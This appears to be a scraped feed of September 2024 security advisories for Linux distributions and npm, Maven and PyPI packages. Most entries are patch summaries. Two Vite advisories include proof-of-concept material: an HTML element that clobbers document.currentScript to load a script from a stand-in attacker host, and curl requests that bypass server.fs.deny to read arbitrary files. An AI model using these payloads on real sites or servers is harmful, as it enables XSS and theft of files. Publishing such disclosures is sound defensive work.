15.09.2024 03:15:05 | fedora | [FEDORA-2024-0c6db96fc3] Fedora 41: flatpak (critical) | Update to 1.15.10 (CVE-2024-42472) | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-0c6db96fc3
14.09.2024 21:19:59 | slackware | [SSA:2024-258-01] libarchive | New libarchive packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/libarchive-3.7.5-i586-1_slack15.0.txz: Upgraded. This update fixes the following security issues: fix multiple vulnerabilities identified by SAST (#2251, #2256) cpio: ignore out-of-range gid/uid/size/ino and harden AFIO parsing (#2258) lzop: prevent integer overflow (#2174) rar4: protect copy_from_lzss_window_to_unp() (#2172, CVE-2024-20696) rar4: fix CVE-2024-26256 (#2269) rar4: fix OOB in delta and audio filter (#2148, #2149) rar4: fix out of boundary access with large files (#2179) rar4: add boundary checks to rgb filter (#2210) rar4: fix OOB access with unicode filenames (#2203) rar5: clear 'data ready' cache on window buffer reallocs (#2265) rpm: calculate huge header sizes correctly (#2158) unzip: unify EOF handling (#2175) util: fix out of boundary access in mktemp functions (#2160) uu: stop processing if lines are too long (#2168) For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-20696 https://www.cve.org/CVERecord?id=CVE-2024-26256 (* Security fix *)``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated package for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libarchive-3.7.5-i586-1_slack15.0.txz Updated package for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libarchive-3.7.5-x86_64-1_slack15.0.txz Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libarchive-3.7.5-i686-1.txz Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libarchive-3.7.5-x86_64-1.txz **MD5 signatures** Slackware 15.0 package: f3b7cdacc3d264f4bcc20f078c0c22b4 libarchive-3.7.5-i586-1_slack15.0.txz Slackware x86_64 15.0 package: 2845ee62628435d7995d5351d6e84e79 libarchive-3.7.5-x86_64-1_slack15.0.txz Slackware -current package: cb11536dc6673f3c6b848229129d0363 l/libarchive-3.7.5-i686-1.txz Slackware x86_64 -current package: 35ec40489069558505b9db8bd66ca2c2 l/libarchive-3.7.5-x86_64-1.txz **Installation instructions** Upgrade the package as root: `# upgradepkg libarchive-3.7.5-i586-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-258-01
16.09.2024 12:59:11 | ubuntu | [USN-6560-3] OpenSSH vulnerability | OpenSSH could be made to crash or run programs as your login if it received a specially crafted input. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6560-3
16.09.2024 03:15:48 | fedora | [FEDORA-2024-ebf3fe7bc9] Fedora 41: python3.13, python3-docs (high) | Python 3.13.0rc2. Security fix for CVE-2024-8088 and CVE-2024-6232 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-ebf3fe7bc9
15.09.2024 05:27:27 | fedora | [FEDORA-2024-05d7ee197e] Fedora 39: clamav (high) | Update to 1.0.7. CVE-2024-20506: Changed the logging module to disable following symlinks on Linux and Unix systems so as to prevent an attacker with existing access to the 'clamd' or 'freshclam' services from using a symlink to corrupt system files. CVE-2024-20505: Fixed a possible out-of-bounds read bug in the PDF file parser that could cause a denial-of-service (DoS) condition. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-05d7ee197e
15.09.2024 05:27:25 | fedora | [FEDORA-2024-03fd821ae2] Fedora 39: bubblewrap, flatpak (critical) | flatpak 1.15.10 and bubblewrap 0.10.0 updates, which together fix CVE-2024-42472 in Flatpak. | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-03fd821ae2
17.09.2024 05:08:06 | fedora | [FEDORA-2024-3dbf10c949] Fedora 39: linux-firmware (high) | Update to upstream 20240909: i915: Update MTL DMC v2.23; cirrus: cs35l56: Add firmware for Cirrus CS35L54 for some HP laptops; amdgpu: Revert sienna cichlid dmcub firmware update; iwlwifi: add Bz FW for core89-58 release; rtl_nic: add firmware rtl8126a-3; update MT7921 WiFi/bluetooth device firmware; amdgpu: update DMCUB to v0.0.232.0 for DCN314 and DCN351; amdgpu: DMCUB updates for various AMDGPU ASICs; rtw89: 8922a: add fw format-1 v0.35.41.0; update MT7925 WiFi/bluetooth device firmware; rtl_bt: Add firmware and config files for RTL8922A; rtl_bt: Add firmware file for the RTL8723CS Bluetooth part; rtl_bt: de-dupe identical config.bin files; rename rtl8723bs_config-OBDA8723.bin -> rtl_bt/rtl8723bs_config.bin; Update AMD SEV firmware; update firmware for MT7996; Revert "i915: Update MTL DMC v2.22"; ath12k: WCN7850 hw2.0: update board-2.bin; ath11k: WCN6855 hw2.0: update to WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41; ath11k: WCN6855 hw2.0: update board-2.bin; ath11k: QCA2066 hw2.1: add to WLAN.HSP.1.1-03926.13-QCAHSPSWPL_V2_SILICONZ_CE-2.52297.3; ath11k: QCA2066 hw2.1: add board-2.bin; ath11k: IPQ5018 hw1.0: update to WLAN.HK.2.6.0.1-01291-QCAHKSWPL_SILICONZ-1; qcom: vpu: add video firmware for sa8775p; amdgpu: DMCUB updates for various AMDGPU ASICs | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3dbf10c949
17.09.2024 05:08:06 | fedora | [FEDORA-2024-f2fc325c40] Fedora 39: python3.13 | Python 3.13.0rc2 | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-f2fc325c40
17.09.2024 03:15:37 | fedora | [FEDORA-2024-3cd42e9e29] Fedora 41: linux-firmware (high) | Update to upstream 20240909: i915: Update MTL DMC v2.23; cirrus: cs35l56: Add firmware for Cirrus CS35L54 for some HP laptops; amdgpu: Revert sienna cichlid dmcub firmware update; iwlwifi: add Bz FW for core89-58 release; rtl_nic: add firmware rtl8126a-3; update MT7921 WiFi/bluetooth device firmware; amdgpu: update DMCUB to v0.0.232.0 for DCN314 and DCN351; amdgpu: DMCUB updates for various AMDGPU ASICs; rtw89: 8922a: add fw format-1 v0.35.41.0; update MT7925 WiFi/bluetooth device firmware; rtl_bt: Add firmware and config files for RTL8922A; rtl_bt: Add firmware file for the RTL8723CS Bluetooth part; rtl_bt: de-dupe identical config.bin files; rename rtl8723bs_config-OBDA8723.bin -> rtl_bt/rtl8723bs_config.bin; Update AMD SEV firmware; update firmware for MT7996; Revert "i915: Update MTL DMC v2.22"; ath12k: WCN7850 hw2.0: update board-2.bin; ath11k: WCN6855 hw2.0: update to WLAN.HSP.1.1-03125-QCAHSPSWPL_V1_V2_SILICONZ_LITE-3.6510.41; ath11k: WCN6855 hw2.0: update board-2.bin; ath11k: QCA2066 hw2.1: add to WLAN.HSP.1.1-03926.13-QCAHSPSWPL_V2_SILICONZ_CE-2.52297.3; ath11k: QCA2066 hw2.1: add board-2.bin; ath11k: IPQ5018 hw1.0: update to WLAN.HK.2.6.0.1-01291-QCAHKSWPL_SILICONZ-1; qcom: vpu: add video firmware for sa8775p; amdgpu: DMCUB updates for various AMDGPU ASICs | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-3cd42e9e29
17.09.2024 01:37:33 | npm | [NPM:GHSA-MMHX-HMJR-R674] DOMPurify allows tampering by prototype pollution (high) | It has been discovered that malicious HTML using special nesting techniques can bypass the depth checking added to DOMPurify in recent releases. It was also possible to use Prototype Pollution to weaken the depth check. This renders dompurify unable to avoid XSS attacks. Fixed by https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21 (3.x branch) and https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc (2.x branch). | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MMHX-HMJR-R674
16.09.2024 23:21:00 | npm | [NPM:GHSA-XGQ9-7GW6-JR5R] Mattermost Desktop App fails to sufficiently configure Electron Fuses (low) | Mattermost Desktop App versions <=5.8.0 fail to sufficiently configure Electron Fuses which allows an attacker to gather Chromium cookies or abuse other misconfigurations via remote/local access. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XGQ9-7GW6-JR5R
16.09.2024 23:20:50 | npm | [NPM:GHSA-5777-RCJJ-9P22] Mattermost Desktop App fails to safeguard screen capture functionality (low) | Mattermost Desktop App versions <=5.8.0 fail to safeguard screen capture functionality which allows an attacker to silently capture high-quality screenshots via JavaScript APIs. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5777-RCJJ-9P22
16.09.2024 23:19:35 | maven | [MAVEN:GHSA-3XQ2-W6J4-C99R] Apache Seata Deserialization of Untrusted Data vulnerability (high) | Deserialization of Untrusted Data vulnerability in Apache Seata. When developers disable authentication on the Seata-Server and do not use the Seata client SDK dependencies, they may construct uncontrolled serialized malicious requests by directly sending bytecode based on the Seata private protocol. This issue affects Apache Seata: 2.0.0, from 1.0.0 through 1.8.0. Users are recommended to upgrade to version 2.1.0/1.8.1, which fixes the issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-3XQ2-W6J4-C99R
16.09.2024 23:16:19 | maven | [MAVEN:GHSA-46HR-3CQ3-MCGP] OpenDaylight Authentication, Authorization and Accounting (AAA) peer impersonation vulnerability (moderate) | An issue was discovered in OpenDaylight Authentication, Authorization and Accounting (AAA) through 0.19.3. A rogue controller can join a cluster to impersonate an offline peer, even if this rogue controller does not possess the complete cluster configuration information. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-46HR-3CQ3-MCGP
16.09.2024 23:16:15 | maven | [MAVEN:GHSA-HV38-H5PJ-C96J] OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) allows follower controller to set up flow entries (moderate) | In OpenDaylight Model-Driven Service Abstraction Layer (MD-SAL) through 13.0.1, a controller with a follower role can configure flow entries in an OpenDaylight clustering deployment. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HV38-H5PJ-C96J
16.09.2024 23:14:54 | npm | [NPM:GHSA-WJ4J-QC2M-FGH7] Mattermost Desktop App Uncontrolled Search Path Vulnerability (moderate) | Mattermost Desktop App versions <=5.8.0 fail to specify an absolute path when searching for the cmd.exe file, which allows a local attacker who is able to put a cmd.exe file in the Downloads folder of a user's machine to cause remote code execution on that machine. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WJ4J-QC2M-FGH7
16.09.2024 22:20:04 | pypi | [PYSEC-2024-77] mindsdb vulnerability | An arbitrary code execution vulnerability exists in versions 23.10.3.0 up to 24.7.4.1 of the MindsDB platform, when the Weaviate integration is installed on the server. If a specially crafted 'SELECT WHERE' clause containing Python code is run against a database created with the Weaviate engine, the code will be passed to an eval function and executed on the server. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-77
16.09.2024 22:20:04 | pypi | [PYSEC-2024-78] mindsdb vulnerability | An arbitrary code execution vulnerability exists in versions 23.12.4.0 up to 24.7.4.1 of the MindsDB platform, when the ChromaDB integration is installed on the server. If a specially crafted 'INSERT' query containing Python code is run against a database created with the ChromaDB engine, the code will be passed to an eval function and executed on the server. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-78
16.09.2024 22:20:04 | pypi | [PYSEC-2024-79] mindsdb vulnerability | An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the MindsDB platform, when the Microsoft SharePoint integration is installed on the server. For databases created with the SharePoint engine, an 'INSERT' query can be used for list creation. If such a query is specially crafted to contain Python code and is run against the database, the code will be passed to an eval function and executed on the server. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-79
16.09.2024 22:20:04 | pypi | [PYSEC-2024-80] mindsdb vulnerability | An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the MindsDB platform, when the Microsoft SharePoint integration is installed on the server. For databases created with the SharePoint engine, an 'INSERT' query can be used for site column creation. If such a query is specially crafted to contain Python code and is run against the database, the code will be passed to an eval function and executed on the server. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-80
16.09.2024 22:20:05 | pypi | [PYSEC-2024-81] mindsdb vulnerability | An arbitrary code execution vulnerability exists in versions 23.10.5.0 up to 24.7.4.1 of the MindsDB platform, when the Microsoft SharePoint integration is installed on the server. For databases created with the SharePoint engine, an 'INSERT' query can be used for list item creation. If such a query is specially crafted to contain Python code and is run against the database, the code will be passed to an eval function and executed on the server. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-81
16.09.2024 22:20:05 | pypi | [PYSEC-2024-82] mindsdb vulnerability | Deserialization of untrusted data can occur in versions 23.3.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded model to run arbitrary code on the server when interacted with. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-82
16.09.2024 22:20:05 | pypi | [PYSEC-2024-83] mindsdb vulnerability | Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded 'inhouse' model to run arbitrary code on the server when used for a prediction. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-83
17.09.2024 00:48:13 | pypi | [PYSEC-2024-84] mindsdb vulnerability | Deserialization of untrusted data can occur in versions 23.10.3.0 and newer of the MindsDB platform, enabling a maliciously uploaded 'inhouse' model to run arbitrary code on the server when a 'describe' query is run on it. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-84
17.09.2024 00:48:13 | pypi | [PYSEC-2024-85] mindsdb vulnerability | Deserialization of untrusted data can occur in versions 23.10.2.0 and newer of the MindsDB platform, enabling a maliciously uploaded 'inhouse' model to run arbitrary code on the server when using 'finetune' on it. | https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-85
18.09.2024 04:54:49 | fedora | [FEDORA-2024-9e85c72624] Fedora 41: chromium (high) | update to 128.0.6613.137 * High CVE-2024-8636: Heap buffer overflow in Skia * High CVE-2024-8637: Use after free in Media Router * High CVE-2024-8638: Type Confusion in V8 * High CVE-2024-8639: Use after free in Autofill | https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-9e85c72624
18.09.2024 01:29:01 | maven | [MAVEN:GHSA-GC7Q-JGJV-VJR2] Keycloak Services has a potential bypass of brute force protection (moderate) | If an attacker launches many login attempts in parallel then the attacker can have more guesses at a password than the brute force protection configuration permits. This is due to the brute force check occurring before the brute force protector has locked the user. **Acknowledgements:** Special thanks to Maurizio Agazzini for reporting this issue and helping us improve our project. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GC7Q-JGJV-VJR2
18.09.2024 00:58:10 | npm | [NPM:GHSA-GP8F-8M3G-QVJ9] Next.js Cache Poisoning (high) | ### Impact By sending a crafted HTTP request, it is possible to poison the cache of a non-dynamic server-side rendered route in the pages router (this does not affect the app router). When this crafted request is sent it could coerce Next.js to cache a route that is meant to not be cached and send a `Cache-Control: s-maxage=1, stale-while-revalidate` header which some upstream CDNs may cache as well. To be potentially affected all of the following must apply: - Next.js between 13.5.1 and 14.2.9 - Using pages router - Using non-dynamic server-side rendered routes e.g. `pages/dashboard.tsx` not `pages/blog/[slug].tsx` The below configurations are unaffected: - Deployments using only app router - Deployments on [Vercel](https://vercel.com/) are not affected ### Patches This vulnerability was resolved in Next.js v13.5.7, v14.2.10, and later. We recommend upgrading regardless of whether you can reproduce the issue or not. ### Workarounds There are no official or recommended workarounds for this issue, we recommend that users patch to a safe version. #### Credits - Allam Rachid (zhero_) - Henry Chen | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-GP8F-8M3G-QVJ9
18.09.2024 00:31:29 | npm | [NPM:GHSA-5J94-F3MF-8685] @backstage/plugin-techdocs-backend vulnerable to circumvention of cross site scripting protection (moderate) | ### Impact An attacker with control of the contents of the TechDocs storage buckets is able to inject executable scripts in the TechDocs content that will be executed in the victim's browser when browsing documentation or navigating to an attacker provided link. ### Patches This has been fixed in the 1.10.13 release of the `@backstage/plugin-techdocs-backend` package. ### References If you have any questions or comments about this advisory: Open an issue in the [Backstage repository](https://github.com/backstage/backstage); Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage) | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5J94-F3MF-8685
18.09.2024 01:25:21 | maven | [MAVEN:GHSA-P72W-R6FV-6G5H] druid-pac4j, Apache Druid extension, has Padding Oracle vulnerability (low) | Padding Oracle vulnerability in Apache Druid extension, druid-pac4j. This could allow an attacker to manipulate a pac4j session cookie. This issue affects Apache Druid versions 0.18.0 through 30.0.0. Since the druid-pac4j extension is optional and disabled by default, Druid installations not using the druid-pac4j extension are not affected by this vulnerability. While we are not aware of a way to meaningfully exploit this flaw, we nevertheless recommend upgrading to version 30.0.1 or higher which fixes the issue and ensuring you have a strong druid.auth.pac4j.cookiePassphrase as a precaution. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P72W-R6FV-6G5H
18.09.2024 01:32:49 | maven | [MAVEN:GHSA-JH66-3545-VPM7] Apache Druid: Users can provide MySQL JDBC properties not on allow list (low) | Apache Druid allows users with certain permissions to read data from other database systems using JDBC. This functionality allows trusted users to set up Druid lookups or run ingestion tasks. Druid also allows administrators to configure a list of allowed properties that users are able to provide for their JDBC connections. By default, this allowed properties list restricts users to TLS-related properties only. However, when configuring a MySQL JDBC connection, users can use a particularly-crafted JDBC connection string to provide properties that are not on this allow list. Users without the permission to configure JDBC connections are not able to exploit this vulnerability. CVE-2021-26919 describes a similar vulnerability which was partially addressed in Apache Druid 0.20.2. This issue is fixed in Apache Druid 30.0.1. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JH66-3545-VPM7
18.09.2024 01:29:20 | npm | [NPM:GHSA-39V3-F278-VJ3G] @backstage/plugin-techdocs-backend storage bucket Directory Traversal vulnerability (moderate) | ### Impact When using the AWS S3 or GCS storage provider for TechDocs it is possible to access content in the entire storage bucket. This can leak contents of the bucket that are not intended to be accessible, as well as bypass permission checks in Backstage. ### Patches This has been fixed in the 1.10.13 release of the `@backstage/plugin-techdocs-backend` package. ### References If you have any questions or comments about this advisory: Open an issue in the [Backstage repository](https://github.com/backstage/backstage); Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage) | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-39V3-F278-VJ3G
18.09.2024 01:29:10 | npm | [NPM:GHSA-3X3F-JCP3-G22J] @backstage/plugin-catalog-backend Prototype Pollution vulnerability (moderate) | ### Impact A malicious actor with authenticated access to a Backstage instance with the catalog backend plugin installed is able to interrupt the service using a specially crafted query to the catalog API. ### Patches This has been fixed in the `1.26.0` release of the `@backstage/plugin-catalog-backend` package. ### References If you have any questions or comments about this advisory: Open an issue in the [Backstage repository](https://github.com/backstage/backstage); Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage) | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3X3F-JCP3-G22J
17.09.2024 22:29:25 | maven | [MAVEN:GHSA-2GH6-WC3M-G37F] hermes-management is vulnerable to RCE due to Apache commons-jxpath (critical) | ### Impact hermes-management is vulnerable to RCE when it processes user-controlled data due to using Apache commons-jxpath. ### Patches Upgrade Hermes to at least hermes-2.2.9 ### References https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/ | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2GH6-WC3M-G37F
18.09.2024 01:28:58 | npm | [NPM:GHSA-64VR-G452-QVP3] Vite DOM Clobbering gadget found in vite bundled scripts that leads to XSS (moderate) | ### Summary We discovered a DOM Clobbering vulnerability in Vite when building scripts to `cjs`/`iife`/`umd` output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present. Note that we have identified similar security issues in Webpack: https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986 ### Details **Backgrounds** DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. For more information about DOM Clobbering, here are some references: [1] https://scnps.co/papers/sp23_domclob.pdf [2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/ **Gadgets found in Vite** We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to `cjs`, `iife`, or `umd`. In such cases, Vite replaces relative paths starting with `__VITE_ASSET__` using the URL retrieved from `document.currentScript`. However, this implementation is vulnerable to a DOM Clobbering attack. The `document.currentScript` lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server. ```const relativeUrlMechanisms = { amd: (relativePath) => { if (relativePath[0] !== ".") relativePath = "./" + relativePath; return getResolveUrl( `require.toUrl('${escapeId(relativePath)}'), document.baseURI` ); }, cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath( relativePath )} : ${getRelativeUrlFromDocument(relativePath)})`, es: (relativePath) => getResolveUrl( `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url` ), iife: (relativePath) => getRelativeUrlFromDocument(relativePath), // NOTE: make sure rollup generate `module` params system: (relativePath) => getResolveUrl( `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url` ), umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath( relativePath )} : ${getRelativeUrlFromDocument(relativePath, true)})`};``` ### PoC Considering a website that contains the following `main.js` script, the developer decides to use Vite to bundle up the program with the following configuration. ```// main.js import extraURL from './extra.js?url' var s = document.createElement('script') s.src = extraURL document.head.append(s)``` ```// extra.js export default "https://myserver/justAnOther.js"``` ```// vite.config.js import { defineConfig } from 'vite' export default defineConfig({ build: { assetsInlineLimit: 0, // To avoid inline assets for PoC rollupOptions: { output: { format: "cjs" }, }, }, base: "./", });``` After running the build command, the developer will get the following bundle as the output. ```// dist/index-DDmIg9VD.js "use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);``` Adding the Vite bundled script, `dist/index-DDmIg9VD.js`, as part of the web page source code, the page could load the `extra.js` file from the attacker's domain, `attacker.controlled.server`. The attacker only needs to insert an `img` tag with the `name` attribute set to `currentScript`. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page. ```<!DOCTYPE html> <html> <head> <title>Vite Example</title> <!-- Attacker-controlled Script-less HTML Element starts--!> <img name="currentScript" src="https://attacker.controlled.server/"></img> <!-- Attacker-controlled Script-less HTML Element ends--!> </head> <script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script> <body></body> </html>``` ### Impact This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of `cjs`, `iife`, or `umd`) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes. ### Patch ```// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296 const getRelativeUrlFromDocument = (relativePath: string, umd = false) => getResolveUrl( `'${escapeId(partialEncodeURIPath(relativePath))}', ${ umd ? `typeof document === 'undefined' ? location.href : ` : '' }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`, )``` | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-64VR-G452-QVP3
18.09.2024 01:28:28npm[NPM:GHSA-9CWX-2883-4WFX] Vite's `server.fs.deny` is bypassed when using `?import&raw` (moderate)

### Summary

The contents of arbitrary files can be returned to the browser.

### Details

`@fs` denies access to files outside of Vite serving allow list. Adding `?import&raw` to the URL bypasses this limitation and returns the file content if it exists.

### PoC

```sh
$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev
$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@fs/tmp/secret.txt"
    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...
```

https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-9CWX-2883-4WFX
17.09.2024 14:54:23ubuntu[USN-7001-2] xmltok library vulnerabilities (critical)Several security issues were fixed in libxmltok.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7001-2
17.09.2024 11:41:17ubuntu[USN-7011-2] ClamAV vulnerabilities (high)Several security issues were fixed in ClamAV.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7011-2
17.09.2024 08:18:27ubuntu[USN-7010-1] DCMTK vulnerabilities (high)Several security issues were fixed in DCMTK.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7010-1
17.09.2024 05:59:08fedora[FEDORA-2024-e6b5e38ae6] Fedora 40: microcode_ctl (medium)
Update to upstream 2.1-45. 20240910
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-02) from revision 0x35 up to 0x36;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-97-05) from revision 0x35 up to 0x36;
Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode from revision 0x433 up to 0x434;
Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode (in intel-ucode/06-9a-03) from revision 0x433 up to 0x434;
Update of 06-9a-03/0x80 (ADL-P 6+8/U 9W L0/R0) microcode (in intel-ucode/06-9a-04) from revision 0x433 up to 0x434;
Update of 06-9a-04/0x80 (ADL-P 2+8 R0) microcode from revision 0x433 up to 0x434;
Update of 06-aa-04/0xe6 (MTL-H/U C0) microcode from revision 0x1e up to 0x1f;
Update of 06-b7-01/0x32 (RPL-S B0) microcode from revision 0x123 up to 0x129;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-02) from revision 0x4121 up to 0x4122;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode (in intel-ucode/06-ba-03) from revision 0x4121 up to 0x4122;
Update of 06-ba-02/0xe0 (RPL-H 6+8/P 6+8 J0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;
Update of 06-ba-03/0xe0 (RPL-U 2+8 Q0) microcode (in intel-ucode/06-ba-08) from revision 0x4121 up to 0x4122;
Update of 06-ba-08/0xe0 microcode from revision 0x4121 up to 0x4122;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode (in intel-ucode/06-bf-02) from revision 0x35 up to 0x36;
Update of 06-97-02/0x07 (ADL-HX/S 8+8 C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-97-05/0x07 (ADL-S 6+0 K0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-bf-02/0x07 (ADL C0) microcode (in intel-ucode/06-bf-05) from revision 0x35 up to 0x36;
Update of 06-bf-05/0x07 (ADL C0) microcode from revision 0x35 up to 0x36;
Update of 06-be-00/0x19 (ADL-N A0) microcode from revision 0x17 up to 0x1a (old pf 0x11).
Addresses CVE-2024-23984, CVE-2024-24968
Added the documentation directory to the list of files owned by the package
https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-e6b5e38ae6
